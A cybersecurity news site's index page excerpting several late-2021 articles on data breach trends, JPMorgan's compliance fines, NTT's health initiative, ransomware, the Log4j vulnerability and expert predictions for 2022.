Home Podcasts Videos Guest Posts Q&A My Take Bio Contact
 

For consumers

 

SHARED INTEL: Data breaches across the globe slowed significantly in Q4 2021 versus Q1-Q3

By Vytautas Kaziukonis

After a gloomy start with its first three breach intensive quarters, 2021 has finally ended, and on a positive note.

Related: Cybersecurity experts reflect on 2021

This conclusion is derived from an analysis of data taken from our data breach detection tool, Surfshark Alert, which comprises publicly available breached data sets to inform our users of potential threats.

Our analysis looked into data breaches that occurred from October to December 2021 (Q4) and compared them with the numbers from July through August 2021 (Q3). Breached accounts were analyzed according to the country’s origin, and the actual time the breach was recorded.

All information either stolen or taken from a system without the authorization of the platform’s owner (in other words, proactively hacked or scrapped) is considered a data breach. Data associations to specific breach instances are only stipulated. Full study data is available here.

GUEST ESSAY: JPMorgan’s $200 million in fines stems from all-too-common compliance failures

By Dima Gutzeit

Last month’s $125 million Security and Exchange Commission (SEC) fine combined with the $75 million U.S. Commodity Futures Trading Commission (CFTC) fine against JPMorgan sent shockwaves through financial and other regulated customer-facing industries.

Related: Why third-party risks are on the rise

According to a SEC release, hefty fines brought against JPMorgan, and its subsidiaries were based on “widespread and longstanding failures by the firm and its employees to maintain and preserve written communications”. These views were echoed in a CFTC release as well.

While the price tag of these violations was shocking, the compliance failure was not. The ever-changing landscape of rapid communication via instant messaging apps, such as WhatsApp, Signal, WeChat, Telegram, and others, has left regulated industries to find a balance between compliance and efficient client communication.

Insecure platforms

Approved forms of communication such as phone calls, emails, and fax are viewed by some consumers as obsolete. So, as teams work to remain relevant, team leaders and employees carry the burden of ensuring a better and more intuitive customer experience.

Many of these instant messaging platforms are secure, even offering end-to-end encryption, so the lack of security is not necessarily in the apps themselves. Without a responsible business communication platform for these conversations to flow through, customer requests and discussions live only on employees’ personal devices.

MY TAKE: What if Big Data and AI could be intensively focused on health and wellbeing?

By Byron V. Acohido

Might it be possible to direct cool digital services at holistically improving the wellbeing of each citizen of planet Earth?

Related: Pursuing a biological digital twin

A movement aspiring to do just that is underway — and it’s not being led by a covey of tech-savvy Tibetan monks. This push is coming from the corporate sector.

Last August, NTT, the Tokyo-based technology giant, unveiled its Health and Wellbeing initiative – an ambitious effort to guide corporate, political and community leaders onto a more enlightened path. NTT, in short, has set out to usher in a new era of human wellness.

Towards this end it has begun sharing videos, whitepapers and reports designed to rally decision makers from all quarters to a common cause. The blue-sky mission is to bring modern data mining and machine learning technologies to bear delivering personalized services that ameliorate not just physical ailments, but also mental and even emotional ones.

That’s a sizable fish to fry. I had a lively discussion with Craig Hinkley, CEO of NTT Application Security, about the thinking behind this crusade. I came away encouraged that some smart folks are striving to pull us in a well-considered direction. For a full drill down, please give the accompanying podcast a listen. Here are a few key takeaways:

A new starting point

Modern medicine has advanced leaps and bounds in my lifetime when it comes to diagnosing and treating severe illnesses. Even so, for a variety of reasons, healthcare sectors in the U.S. and other jurisdictions have abjectly failed over the past 20 years leveraging Big Data to innovate personalized healthcare services.

ROUNDTABLE: What happened in privacy and cybersecurity in 2021 — and what’s coming in 2022

By Byron V. Acohido

In 2021, we endured the fallout of a seemingly endless parade of privacy controversies and milestone cyber attacks.

Related: The dire need to security-proof APIs

The Solar Winds hack demonstrated supply chain exposures; the attempted poisoning of a Tampa suburb’s water supply highlighted public utilities at risk; and the Colonial Winds ransomware attack signaled cyber extortionist rings continuing to run rampant.

On the privacy front, California beefed up its consumer data privacy regulations even as Facebook and Apple publicly feuded over how each of these tech giants abuse of consumer privacy and loosey handle sensitive data.

Meanwhile, President Biden issued a cybersecurity executive order finally putting the federal government’s regulatory stamp on foundational cyber hygiene practices many organizations should have already been doing, yet continue to gift short shrift.

Last Watchdog sought commentary from technology thought leaders about lessons learned in 2021– and any guidance they might have to offer heading into 2022.

GUEST ESSAY: Why the arrests of cyber criminals in 2021 will incentize attackers in 2022

By Wade Lance

In 2021, law enforcement continued making a tremendous effort to track down, capture and arrest ransomware operators, to take down ransomware infrastructure, and to claw back ransomware payments.

Related: The targeting of supply chains

While some of these efforts have been successful, and may prevent more damage from being done, it is important to realize that headline news is a lightning rod for more attacks. Successful attacks breed copycats, and their arrests make room for replacements. Malicious actors are opportunistic.

Of course they don’t want to get busted and they don’t want authorities taking down their infrastructure, but these arrests are an incentive to get into the ransomware market and a learning experience on how to adapt their tactics.

I expect a new wave of ransomware operators that use cryptocurrency to avoid tracking, remotely-located operations to avoid extradition and arrest, and the hardening of operational security to avoid infrastructure take down.

SHARED INTEL: Log4j vulnerability presents a gaping attack vector companies must heed in 2022

By Byron V. Acohido

As we close out 2021, a gargantuan open-source vulnerability has reared its ugly head.

Related: The case for ‘SBOM’

This flaw in the Apache Log4J logging library is already being aggressively probed and exploited by threat actors — and it is sure to become a major headache for security teams in 2022.

“This vulnerability is so dangerous because of its massive scale. Java is used on over 3 billion devices, and a large number of those use Log4j,” says Forrester cybersecurity analyst Allie Mellen, adding that crypto miners and botnet operators are already making hay.

“We can expect more devastating attacks, like ransomware, leveraging this vulnerability in the future,” Mellen adds. “This vulnerability will be used for months if not years to attack enterprises, which is why security teams must strike while the iron is hot.”

This Log4j vulnerability was disclosed to Apache on Nov. 24 by the Alibaba Cloud Security team. Then on Dec. 9, the vulnerability, formally designated CVE-2021-44228, was disclosed on Twitter; meanwhile a  proof-of-concept exploit got posted on GitHub.

This flaw in an open-source web server software used far and wide  puts open-source risks in the spotlight – yet again. Companies will have to deal with Log4J in much the same manner as they were compelled to react to the open source flaws Heartbleed and Shellshock in 2014.

ROUNDTABLE: Cybersecurity experts reflect on 2021, foresee intensifying challenges in 2022

By Byron V. Acohido

Privacy and cybersecurity challenges and controversies reverberated through all aspect of business, government and culture in the year coming to a close.

Related: Thumbs up for Biden’s cybersecurity exec order

Last Watchdog sought commentary from technology thought leaders about lessons learned in 2021– and guidance heading into 2022. More than two dozen experts participated. Here the first of two articles highlighting what they had to say. Comments edited for clarity and length. The second roundtable column will be published on Dec. 27th.

Paul Ayers, CEO, Noetic Cyber

In 2021, large supply chain attacks successfully exploited critical vulnerabilities.  Patching is hard and prioritization is key. By mapping cyber relationships to business context, security teams can focus on a smaller number of critical assets and vulnerabilities.

The cyber industry swings back and forth between prevention and response. A renewed focus on preventative approaches, like security posture management, cyber hygiene and cyber asset management shows organizations are trying to anticipate these problems. Forward thinking security teams working to unlock siloed telemetry and generate a wider cybersecurity view of the organization.

Dr. Darren Williams, CEO, BlackFog

We’re seeing ransomware gangs morph into savvy businesses, with one going so far as to create a fake company to recruit talent. In 2022, we’ll see this trend continue to pick up steam, with greater coordination between gangs, double extortion evolving to triple extortion, and short selling schemes skyrocketing.

Additionally, we will see a shift in threat actors coming from Southeast Asia and Africa. As cyber criminals look to find cheaper labor and technical expertise, we’ll see activity pick up in these regions in 2022 and beyond.